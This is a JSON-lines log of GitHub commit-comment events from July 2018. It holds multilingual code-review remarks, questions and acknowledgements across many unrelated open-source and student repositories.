{"id":"7941680045","type":"CommitCommentEvent","actor":{"login":"timogauweiler"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29651313,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-10T06:09:06Z","updated_at":"2018-07-10T06:09:06Z","author_association":"NONE","body":"@soebbing I would do that – if I only knew what that icon should say/do (as I already asked) and `sw-icon-leftcross` sounds wrong for me – I would say it's either a (scandinavian) flag like @mitelg said or (more likely for me) a table/grid?"}},"created_at":"2018-07-10T06:09:06Z"}
{"id":"7941680666","type":"CommitCommentEvent","actor":{"login":"gour9808"},"repo":{"name":"gour9808/RouteTesting"},"payload":{"comment":{"id":29651314,"position":4,"line":14,"path":"src/app/toolbar/toolbar.component.ts","commit_id":"62b45ed372fc659fe9b13045fbc23ee23e1e4da2","created_at":"2018-07-10T06:09:17Z","updated_at":"2018-07-10T06:09:17Z","author_association":"OWNER","body":"we"}},"created_at":"2018-07-10T06:09:17Z"}
{"id":"7941683843","type":"CommitCommentEvent","actor":{"login":"GetlostWGY"},"repo":{"name":"seriouszyx/uniNote"},"payload":{"comment":{"id":29651317,"position":null,"line":null,"path":null,"commit_id":"33acfaaef3e332ceb4960608ef83d4d503ec42fd","created_at":"2018-07-10T06:10:17Z","updated_at":"2018-07-10T06:10:17Z","author_association":"NONE","body":"GetlostWGY"}},"created_at":"2018-07-10T06:10:17Z"}
{"id":"7941687431","type":"CommitCommentEvent","actor":{"login":"eco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29651322,"position":10,"line":196,"path":"addons/web/static/src/js/core/ajax.js","commit_id":"91fe5cb307c123f6dd1b888cb2ab77cac76bbeef","created_at":"2018-07-10T06:11:21Z","updated_at":"2018-07-10T06:11:21Z","author_association":"NONE","body":"I added \"If the url has already been requested and loaded, the promise will resolve immediately.\""}},"created_at":"2018-07-10T06:11:21Z"}
{"id":"7941687439","type":"CommitCommentEvent","actor":{"login":"mvz"},"repo":{"name":"whitequark/parser"},"payload":{"comment":{"id":29651323,"position":null,"line":null,"path":null,"commit_id":"d6d3d4533450ea91334d8888a80362a52dbc5f0d","created_at":"2018-07-10T06:11:21Z","updated_at":"2018-07-10T06:11:21Z","author_association":"NONE","body":"Are all these changes in 2.5.1.1?"}},"created_at":"2018-07-10T06:11:21Z"}
{"id":"7941689399","type":"CommitCommentEvent","actor":{"login":"sale7-778"},"repo":{"name":"primer/primer"},"payload":{"comment":{"id":29651327,"position":null,"line":null,"path":null,"commit_id":"849e9030f58046536f9eac088f553e58d4734514","created_at":"2018-07-10T06:11:58Z","updated_at":"2018-07-10T06:11:58Z","author_association":"NONE","body":"[ultrasurf 16-ahla-3alam.zip](https://github.com/primer/primer/files/2179069/ultrasurf.16-ahla-3alam.zip)\r\n"}},"created_at":"2018-07-10T06:11:58Z"}
{"id":"7941692731","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29651330,"position":5,"line":11,"path":"3-17/3-17.cpp","commit_id":"0fa5b64dca5b66918b92ab38597b16eccf821c56","created_at":"2018-07-10T06:12:58Z","updated_at":"2018-07-10T06:12:58Z","author_association":"COLLABORATOR","body":"std::stringはクラスではないです。"}},"created_at":"2018-07-10T06:12:58Z"}
{"id":"7941693591","type":"CommitCommentEvent","actor":{"login":"snnugiser"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651333,"position":2,"line":2,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T06:13:14Z","updated_at":"2018-07-10T06:13:14Z","author_association":"OWNER","body":"1. 应添加函数描述，包括函数功能，输入描述，输出描述\r\n2. 坐标转换是比较专业的代码，即使是本专业的人，对其中的各种临时变量也一时搞不清楚，应添加公式的参考出处（比如某本书，多少页，或某个链接）\r\n3. 需要讨论的：\r\n   a) 既然是C#语言，输入更应该是一个三维坐标类，而不是数组；\r\n   b)即便是C语言的写法，如果输入数组，对输入参数一定要判定数组长度，不满足要求是要处理的。\r\n   c) 如果输入是坐标类，是否可以将输出作为返回值（而不是ref传出）\r\n   d) 如果这个函数是坐标类的成员函数，是不是可以把这个函数成非静态，并不要输入参数 （直接读取类的成员变量）"}},"created_at":"2018-07-10T06:13:14Z"}
{"id":"7941694690","type":"CommitCommentEvent","actor":{"login":"GetlostWGY"},"repo":{"name":"seriouszyx/uniNote"},"payload":{"comment":{"id":29651334,"position":7,"line":5,"path":"README.txt","commit_id":"33acfaaef3e332ceb4960608ef83d4d503ec42fd","created_at":"2018-07-10T06:13:34Z","updated_at":"2018-07-10T06:13:34Z","author_association":"NONE","body":"GetlostWGY"}},"created_at":"2018-07-10T06:13:34Z"}
{"id":"7941695319","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29651337,"position":null,"line":null,"path":null,"commit_id":"df5334ae28085a0622f080fcb01cae78a279a1da","created_at":"2018-07-10T06:13:47Z","updated_at":"2018-07-10T06:13:47Z","author_association":"COLLABORATOR","body":"@Sekva \r\n\r\nLembra do txt pra fazer a reordenação."}},"created_at":"2018-07-10T06:13:47Z"}
{"id":"7941703215","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29651362,"position":null,"line":null,"path":null,"commit_id":"de054e29de455fa874830d759d6dcab2c1dbef55","created_at":"2018-07-10T06:16:14Z","updated_at":"2018-07-10T06:16:14Z","author_association":"CONTRIBUTOR","body":"uwu"}},"created_at":"2018-07-10T06:16:14Z"}
{"id":"7941704922","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651363,"position":6,"line":31,"path":"Lesson 3/train.rb","commit_id":"a615be3e558022e83d9a318d0184c114a2e1849f","created_at":"2018-07-10T06:16:44Z","updated_at":"2018-07-10T06:16:44Z","author_association":"NONE","body":"какой-то не очень нужный метод мне кажется... ну если хочешь оставь )\r\nхотя судя по использованию лучше вернуть в Роут методы для первой и последней станции"}},"created_at":"2018-07-10T06:16:44Z"}
{"id":"7941705660","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29651365,"position":null,"line":null,"path":null,"commit_id":"df5334ae28085a0622f080fcb01cae78a279a1da","created_at":"2018-07-10T06:16:58Z","updated_at":"2018-07-10T06:16:58Z","author_association":"COLLABORATOR","body":"Acho que é bom mudar esse arquivo (txt) de lugar. Quando for coisar as tabelas, lembra.. \r\nFica feio dar um commit so pra isso. :v"}},"created_at":"2018-07-10T06:16:58Z"}
{"id":"7941706800","type":"CommitCommentEvent","actor":{"login":"millwala53"},"repo":{"name":"ajorquera/pano-editor"},"payload":{"comment":{"id":29651369,"position":4,"line":9,"path":"public/index.html","commit_id":"7a756fc6050ac6e6ad5225f2dd8bee6fd4ceaf74","created_at":"2018-07-10T06:17:20Z","updated_at":"2018-07-10T06:17:20Z","author_association":"COLLABORATOR","body":"yeah ill inject them in the build process.. other than this everything okay? "}},"created_at":"2018-07-10T06:17:20Z"}
{"id":"7941708416","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_7"},"payload":{"comment":{"id":29651372,"position":3,"line":3,"path":"script.js","commit_id":"f98d816d26d75db2d3084e5ef0b960b3417e3c75","created_at":"2018-07-10T06:17:48Z","updated_at":"2018-07-10T06:17:48Z","author_association":"NONE","body":"odtąd "}},"created_at":"2018-07-10T06:17:48Z"}
{"id":"7941708722","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651373,"position":48,"line":48,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:17:54Z","updated_at":"2018-07-10T06:17:54Z","author_association":"NONE","body":"здесь тернарник смысла не имеет совсем - если индекс больше возможного и так вернется \"нил\""}},"created_at":"2018-07-10T06:17:54Z"}
{"id":"7941708866","type":"CommitCommentEvent","actor":{"login":"zhenshuitieniu"},"repo":{"name":"finals/bcache"},"payload":{"comment":{"id":29651374,"position":null,"line":null,"path":null,"commit_id":"cf3624893564645d925d2a8196b99fe01c3cfce4","created_at":"2018-07-10T06:17:56Z","updated_at":"2018-07-10T06:17:56Z","author_association":"NONE","body":"I have fix io hang and io err when hotplug ssd and mode change with fio"}},"created_at":"2018-07-10T06:17:56Z"}
{"id":"7941710394","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_7"},"payload":{"comment":{"id":29651377,"position":13,"line":13,"path":"script.js","commit_id":"f98d816d26d75db2d3084e5ef0b960b3417e3c75","created_at":"2018-07-10T06:18:26Z","updated_at":"2018-07-10T06:18:26Z","author_association":"NONE","body":"Dotąd - tego kawałka nie potrzebujesz. Masz już to w state w `constructor`. Tutaj na razie nie określamy propTypes bo ich tak na prawdę nie potrzebujemy"}},"created_at":"2018-07-10T06:18:26Z"}
{"id":"7941710697","type":"CommitCommentEvent","actor":{"login":"mehedi47"},"repo":{"name":"mehedi47/C_Programming_code"},"payload":{"comment":{"id":29651378,"position":null,"line":null,"path":null,"commit_id":"168e64ed0302a9614b522a14ce01162866cdae84","created_at":"2018-07-10T06:18:32Z","updated_at":"2018-07-10T06:18:32Z","author_association":"OWNER","body":"This program is only linear search"}},"created_at":"2018-07-10T06:18:32Z"}
{"id":"7941712467","type":"CommitCommentEvent","actor":{"login":"OskarLebuda"},"repo":{"name":"och-karr/zadanie_15_7"},"payload":{"comment":{"id":29651383,"position":null,"line":null,"path":null,"commit_id":"f98d816d26d75db2d3084e5ef0b960b3417e3c75","created_at":"2018-07-10T06:19:05Z","updated_at":"2018-07-10T06:19:05Z","author_association":"NONE","body":"Brakuje funkcji render, która wyrenderuje nam ten element"}},"created_at":"2018-07-10T06:19:05Z"}
{"id":"7941718239","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651390,"position":52,"line":52,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:20:50Z","updated_at":"2018-07-10T06:20:50Z","author_association":"NONE","body":"здесь было бы лучше записать опять же без тернарника\r\nкак-то так, к примеру:\r\n```ruby\r\n@route.station_list[@route_index - 1] if station_current != stations.first\r\n```\r\nесли условие не выполнится метод и так вернет \"нил\""}},"created_at":"2018-07-10T06:20:50Z"}
{"id":"7941718973","type":"CommitCommentEvent","actor":{"login":"micxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29651391,"position":5,"line":5,"path":"Longest Substring With k Distinct Chars.js","commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-10T06:21:03Z","updated_at":"2018-07-10T06:21:03Z","author_association":"OWNER","body":"actually i think i got the time complexity wrong. might be O(2^s)?"}},"created_at":"2018-07-10T06:21:03Z"}
{"id":"7941744517","type":"CommitCommentEvent","actor":{"login":"dcliubing"},"repo":{"name":"dcliubing/excel"},"payload":{"comment":{"id":29651428,"position":null,"line":null,"path":null,"commit_id":"a67a9ed81380f2e95f6978f7b64f657ce6e0c391","created_at":"2018-07-10T06:28:32Z","updated_at":"2018-07-10T06:28:32Z","author_association":"OWNER","body":"增加了转子流量计"}},"created_at":"2018-07-10T06:28:32Z"}
{"id":"7941748166","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29651430,"position":31,"line":31,"path":"3-17/3-17.cpp","commit_id":"0fa5b64dca5b66918b92ab38597b16eccf821c56","created_at":"2018-07-10T06:29:34Z","updated_at":"2018-07-10T06:29:34Z","author_association":"COLLABORATOR","body":"インデントがずれているように見えます。(石井)"}},"created_at":"2018-07-10T06:29:34Z"}
{"id":"7941754233","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":29651437,"position":169,"line":169,"path":"src/nodelet/contour_moments_nodelet.cpp","commit_id":"574e0a0946f755bba8eff759922956b38e2140d2","created_at":"2018-07-10T06:31:18Z","updated_at":"2018-07-10T06:31:18Z","author_association":"COLLABORATOR","body":"@chibi314 FYI"}},"created_at":"2018-07-10T06:31:18Z"}
{"id":"7941754358","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29651438,"position":32,"line":75,"path":"Author.php","commit_id":"2dd039139718ef507f23e6ce50340ad4ca83cd9f","created_at":"2018-07-10T06:31:20Z","updated_at":"2018-07-10T06:31:20Z","author_association":"NONE","body":"intval($limit) > 0"}},"created_at":"2018-07-10T06:31:20Z"}
{"id":"7941755434","type":"CommitCommentEvent","actor":{"login":"npurushe"},"repo":{"name":"requery/sqlite-android"},"payload":{"comment":{"id":29651440,"position":null,"line":null,"path":null,"commit_id":"6f2070b16a4fbbdcd24c5a4423ded981ef3c5c08","created_at":"2018-07-10T06:31:40Z","updated_at":"2018-07-10T06:31:40Z","author_association":"CONTRIBUTOR","body":"@mikehardy Can you please open an issue with this information. Thanks!"}},"created_at":"2018-07-10T06:31:40Z"}
{"id":"7941756287","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29651441,"position":71,"line":71160,"path":"apertium-cat.cat.dix","commit_id":"2b75182b3e961d2b76947214537ea930516253ad","created_at":"2018-07-10T06:31:54Z","updated_at":"2018-07-10T06:31:54Z","author_association":"COLLABORATOR","body":"Segons la nova ortografia, broncoespasme. Aquestes haurien de quedar com a r=\"LR\"."}},"created_at":"2018-07-10T06:31:54Z"}
{"id":"7941759009","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29651446,"position":5,"line":5,"path":"Category.php","commit_id":"2dd039139718ef507f23e6ce50340ad4ca83cd9f","created_at":"2018-07-10T06:32:40Z","updated_at":"2018-07-10T06:32:40Z","author_association":"NONE","body":"Не надо называть переменные $catName и тд. Назови просто $name. То, что это категория видно из класса"}},"created_at":"2018-07-10T06:32:40Z"}
{"id":"7941760367","type":"CommitCommentEvent","actor":{"login":"domoritz"},"repo":{"name":"vega/vega-datasets"},"payload":{"comment":{"id":29651448,"position":null,"line":null,"path":null,"commit_id":"c691c7d7bd9c4305444acdd581dee9746d6f5aaf","created_at":"2018-07-10T06:33:06Z","updated_at":"2018-07-10T06:33:06Z","author_association":"MEMBER","body":"The date format is super inconsistent. Now we have both `1963-01-01` and `25-Aug-06`. "}},"created_at":"2018-07-10T06:33:06Z"}
{"id":"7941760681","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29651449,"position":71,"line":71160,"path":"apertium-cat.cat.dix","commit_id":"2b75182b3e961d2b76947214537ea930516253ad","created_at":"2018-07-10T06:33:11Z","updated_at":"2018-07-10T06:33:11Z","author_association":"COLLABORATOR","body":"O millor encara: que broncospasme remeti a broncoespasme, i en els bilingües fer servir només broncoespasme."}},"created_at":"2018-07-10T06:33:11Z"}
{"id":"7941760789","type":"CommitCommentEvent","actor":{"login":"ecrmnn"},"repo":{"name":"ecrmnn/collect.js"},"payload":{"comment":{"id":29651452,"position":null,"line":null,"path":null,"commit_id":"35d27df6b14d3ae03c5ea63ee975e94787fa29bf","created_at":"2018-07-10T06:33:13Z","updated_at":"2018-07-10T06:33:13Z","author_association":"OWNER","body":"Since \"nested dot notation\" is not supported in Laravel Collections for anything other than `pluck()` I'm not sure. For now I'd recommed that you use `macro` to override the `get()` method.\r\n\r\nhttps://github.com/ecrmnn/collect.js#macro"}},"created_at":"2018-07-10T06:33:13Z"}
{"id":"7941762168","type":"CommitCommentEvent","actor":{"login":"dragonying"},"repo":{"name":"dragonying/furture"},"payload":{"comment":{"id":29651456,"position":null,"line":null,"path":null,"commit_id":"f4ba4ba9738978854753ac8343d4726c1f5a2ac8","created_at":"2018-07-10T06:33:37Z","updated_at":"2018-07-10T06:33:37Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-10T06:33:37Z"}
{"id":"7941762811","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29651459,"position":5,"line":55,"path":"src/video/renderer.js","commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T06:33:49Z","updated_at":"2018-07-10T06:33:49Z","author_association":"MEMBER","body":"indeed, but it does break it..... see for yourself (if you build environment is still up to date)."}},"created_at":"2018-07-10T06:33:49Z"}
{"id":"7941765523","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":29651465,"position":5,"line":55,"path":"src/video/renderer.js","commit_id":"b1b43279154429e8aa4fa5afa29eddcd10bd19cc","created_at":"2018-07-10T06:34:37Z","updated_at":"2018-07-10T06:34:37Z","author_association":"MEMBER","body":"I tried for one hour to understand why, but I could not find the proper reason so I reverted my changes (I changed that a couple of weeks ago, before it was `(255, 255, 255, 1.0)` since forever"}},"created_at":"2018-07-10T06:34:37Z"}
{"id":"7941767262","type":"CommitCommentEvent","actor":{"login":"PoisonAlien"},"repo":{"name":"PoisonAlien/maftools"},"payload":{"comment":{"id":29651467,"position":48,"line":138,"path":"R/dashboard.R","commit_id":"3c09ec61c710c458cef23c4fddfda68f7b448234","created_at":"2018-07-10T06:35:08Z","updated_at":"2018-07-10T06:35:08Z","author_association":"OWNER","body":"Ah! Such a careless mistake. Sorry, will fix it soon."}},"created_at":"2018-07-10T06:35:08Z"}
{"id":"7941769399","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29651470,"position":66,"line":66,"path":"src/main/java/movierent/controller/UserController.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-10T06:35:44Z","updated_at":"2018-07-10T06:35:44Z","author_association":"NONE","body":"delete this line"}},"created_at":"2018-07-10T06:35:44Z"}
{"id":"7941770238","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29651473,"position":49,"line":332,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T06:35:58Z","updated_at":"2018-07-10T06:35:58Z","author_association":"COLLABORATOR","body":"This is a pool per app. Here we create the pool if not created and allocate a dma virtual engine. I am confused about the comment, should I change the API name ? "}},"created_at":"2018-07-10T06:35:58Z"}
{"id":"7941771406","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29651475,"position":44,"line":44,"path":"src/main/java/movierent/controller/UserController.java","commit_id":"907fb4b083cf168a68561d1ea08017c6d86a7443","created_at":"2018-07-10T06:36:17Z","updated_at":"2018-07-10T06:36:17Z","author_association":"NONE","body":"remove user attribute from session"}},"created_at":"2018-07-10T06:36:17Z"}
{"id":"7941772768","type":"CommitCommentEvent","actor":{"login":"andrew-bulov"},"repo":{"name":"ElinaValieva/railwayApp"},"payload":{"comment":{"id":29651479,"position":9,"line":9,"path":"src/main/java/com/elina/railwayApp/exception/ErrorCode.java","commit_id":"ffd109b9ecaba8ef1b1e8f8aa6a0cb0f02cabcde","created_at":"2018-07-10T06:36:40Z","updated_at":"2018-07-10T06:36:40Z","author_association":"NONE","body":"Идея хорошая, но подумай на досуге, как ты будешь решать проблему многоязычности в реальном приложении.\r\nДля сейчас  - ок."}},"created_at":"2018-07-10T06:36:40Z"}
{"id":"7941773621","type":"CommitCommentEvent","actor":{"login":"sfraza"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29651480,"position":73,"line":350,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T06:36:55Z","updated_at":"2018-07-10T06:36:55Z","author_association":"COLLABORATOR","body":"halide_hexagon_delete_dma_pool - > Here we are deleting the entire pool . All the engines are deallocated for the final time. "}},"created_at":"2018-07-10T06:36:55Z"}
{"id":"7941773802","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651482,"position":17,"line":17,"path":"src/opentracing/Tracer.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T06:36:59Z","updated_at":"2018-07-10T06:36:59Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T06:36:59Z"}
{"id":"7941776321","type":"CommitCommentEvent","actor":{"login":"andrew-bulov"},"repo":{"name":"ElinaValieva/railwayApp"},"payload":{"comment":{"id":29651488,"position":20,"line":20,"path":"src/main/java/com/elina/railwayApp/exception/RailwayExceptionHandler.java","commit_id":"ffd109b9ecaba8ef1b1e8f8aa6a0cb0f02cabcde","created_at":"2018-07-10T06:37:43Z","updated_at":"2018-07-10T06:37:43Z","author_association":"NONE","body":"Только log.error(...)\r\nЕсли ты выходишь в PROD, то там сразу повышается уровень логирования и твою ошибку ты просто никогда не увидишь."}},"created_at":"2018-07-10T06:37:43Z"}
{"id":"7941778615","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29651497,"position":null,"line":null,"path":null,"commit_id":"72ab9118413abedf4e773f3c4d6e05c8a60df5f0","created_at":"2018-07-10T06:38:21Z","updated_at":"2018-07-10T06:38:21Z","author_association":"OWNER","body":"I wouldn't bother improving the imports in all of `LanguageRenderer` as all of this code is going to change a lot."}},"created_at":"2018-07-10T06:38:21Z"}
{"id":"7941783339","type":"CommitCommentEvent","actor":{"login":"luowenbotest"},"repo":{"name":"luowenbotest/test6666"},"payload":{"comment":{"id":29651503,"position":null,"line":null,"path":null,"commit_id":"d9724cb7b68c04e547048fc706c67cff7a845f5e","created_at":"2018-07-10T06:39:40Z","updated_at":"2018-07-10T06:39:40Z","author_association":"OWNER","body":"56465465"}},"created_at":"2018-07-10T06:39:40Z"}
{"id":"7941786904","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651506,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:40:40Z","updated_at":"2018-07-10T06:40:40Z","author_association":"NONE","body":"в файле \"мейн\" конечно же не должно быть кода... это же ООП... весь код в классах ))\r\n    требования к \"мейн\" примерно такие:\r\n    - в этом файле логики нет вообще\r\n    - в нем есть \"реквайер\" всех остальных необходимых файлов\r\n    - в нем создается объект класса Интерфейс\r\n    - затем создается объект класса, назовем его к примеру контроллером\r\n      можно назвать по другому, по сути это класс, который управляет рантаймом программы, направляет ход ее выполения в зависимости от вводов пользователя и результатов работы самого приложения\r\n      когда происходит  инстанциация этого класса (к примеру Гейм, Казино, Тейбл),  который будет \"вести игру\", то ему в качестве аргумента передается объект интерфейса"}},"created_at":"2018-07-10T06:40:40Z"}
{"id":"7941787149","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651507,"position":26,"line":26,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T06:40:44Z","updated_at":"2018-07-10T06:40:44Z","author_association":"OWNER","body":"хм, в голове у меня вагон был самодвижущимся :) т.е. первый бы состав а второй вагон."}},"created_at":"2018-07-10T06:40:44Z"}
{"id":"7941788067","type":"CommitCommentEvent","actor":{"login":"andrew-bulov"},"repo":{"name":"ElinaValieva/railwayApp"},"payload":{"comment":{"id":29651511,"position":91,"line":400,"path":"src/main/java/com/elina/railwayApp/service/Implementation/ScheduleServiceImpl.java","commit_id":"ffd109b9ecaba8ef1b1e8f8aa6a0cb0f02cabcde","created_at":"2018-07-10T06:40:59Z","updated_at":"2018-07-10T06:40:59Z","author_association":"NONE","body":"Ок, я могу заставить себя смириться с checked exception для валидации ввода.\r\nНо почему не написать обратный порядок: if(schedule==null){ throw...) else{}\r\nТак же читаемость будет выше, имхо."}},"created_at":"2018-07-10T06:40:59Z"}
{"id":"7941790277","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651512,"position":19,"line":19,"path":"src/opentracing/Tracer.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T06:41:37Z","updated_at":"2018-07-10T06:41:37Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T06:41:37Z"}
{"id":"7941792311","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"enextus/thinknetica"},"payload":{"comment":{"id":29651513,"position":null,"line":null,"path":null,"commit_id":"427a8dc35dc9165a55849ecce7a08222f6622feb","created_at":"2018-07-10T06:42:14Z","updated_at":"2018-07-10T06:42:14Z","author_association":"NONE","body":"как уже множно догадаться из первого коммента - вторая супер-ошибка - отсутствие выделенного интерфейса... \r\n**ИНТЕРФЕЙС** дожен быть полностью вынесен из всех классов!!!\r\n    - лучше всего реализовать это с помощью отдельного класса, к примеру `class Interface` (возможно нескольких классов)\r\n    - все методы \"общения с пользователем\" (вывод и ввод) должны быть только в этом классе\r\n    - вызов методов интерфейса должен происходить ТОЛЬКО ИЗ класса (классов) КОНТРОЛЛЕРА (методы вызываться на инстансе класса `Interface`)\r\n    - интерфейс не должен ничего знать о приложении вообще, он не должен хранить переменные приложение (только свои служебные), он не должен знать о классах и методах приложения\r\n\r\n    **главный плюс такого подхода** и одновременно ориентир, для правильного понимания того, как нужно писать интерфейс и его взаимодействие с контроллером:\r\n    *вместо интерфейса командной строки можно в любой момент написать другой интерфейс, который будет к примеру работать не в командной строке, а отправлять запросы посредством  http протокола... (лишь бы названия методов, т.е. интерфейс класса совпадал), а  логика должна спокойно продолжить работу не обращая внимания на смену интерфейса...*\r\n"}},"created_at":"2018-07-10T06:42:14Z"}
{"id":"7941792727","type":"CommitCommentEvent","actor":{"login":"wx-ta"},"repo":{"name":"fifteenhex/sx127x"},"payload":{"comment":{"id":29651515,"position":null,"line":null,"path":null,"commit_id":"90fcb7879e106b6e47b09d654fc663d98f402e49","created_at":"2018-07-10T06:42:21Z","updated_at":"2018-07-10T06:42:21Z","author_association":"NONE","body":"Thanks for your reply，I will open an issue for this."}},"created_at":"2018-07-10T06:42:21Z"}
{"id":"7941793336","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651517,"position":57,"line":65,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:42:32Z","updated_at":"2018-07-10T06:42:32Z","author_association":"CONTRIBUTOR","body":"I agree move makes more sense here."}},"created_at":"2018-07-10T06:42:32Z"}
{"id":"7941794136","type":"CommitCommentEvent","actor":{"login":"cmlili"},"repo":{"name":"derbedhruv/fpm"},"payload":{"comment":{"id":29651519,"position":null,"line":null,"path":null,"commit_id":"0d78cc146db8aeab6bc8f7ab3cc77015a2d990da","created_at":"2018-07-10T06:42:46Z","updated_at":"2018-07-10T06:42:46Z","author_association":"NONE","body":"Thank you for your reply！I am sorry to let you recall this early work.And I  saw your demo video about FPM reconstruction in Youtube.It's successful! However, I have problem in determining the change of the pupil coordinate shift caused by the LEDs in different angles in the frequency domain. That made me reconstruct failure.Can you tell me how to determine the pupil coordinate or if you still have the  reconstruct code, can you share it with me?\n\n\n-----原始邮件-----\n发件人:\"Dhruv Joshi\" <notifications@github.com>\n发送时间:2018-07-10 11:20:50 (星期二)\n收件人: derbedhruv/fpm <fpm@noreply.github.com>\n抄送: cmlili <21730009@zju.edu.cn>, Mention <mention@noreply.github.com>\n主题: Re: [derbedhruv/fpm] imaging on the optical system as a separate function (0d78cc1)\n\n\n\n@cmlili please check out the latest imageit.m - you will see that 2*pupil_radius is used. This is a random older commit and it was too long ago so it's confusing to understand through this.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-10T06:42:46Z"}
{"id":"7941796790","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651522,"position":165,"line":169,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T06:43:31Z","updated_at":"2018-07-10T06:43:31Z","author_association":"CONTRIBUTOR","body":"Indeed, I agree - just old code before I cared about such things."}},"created_at":"2018-07-10T06:43:31Z"}
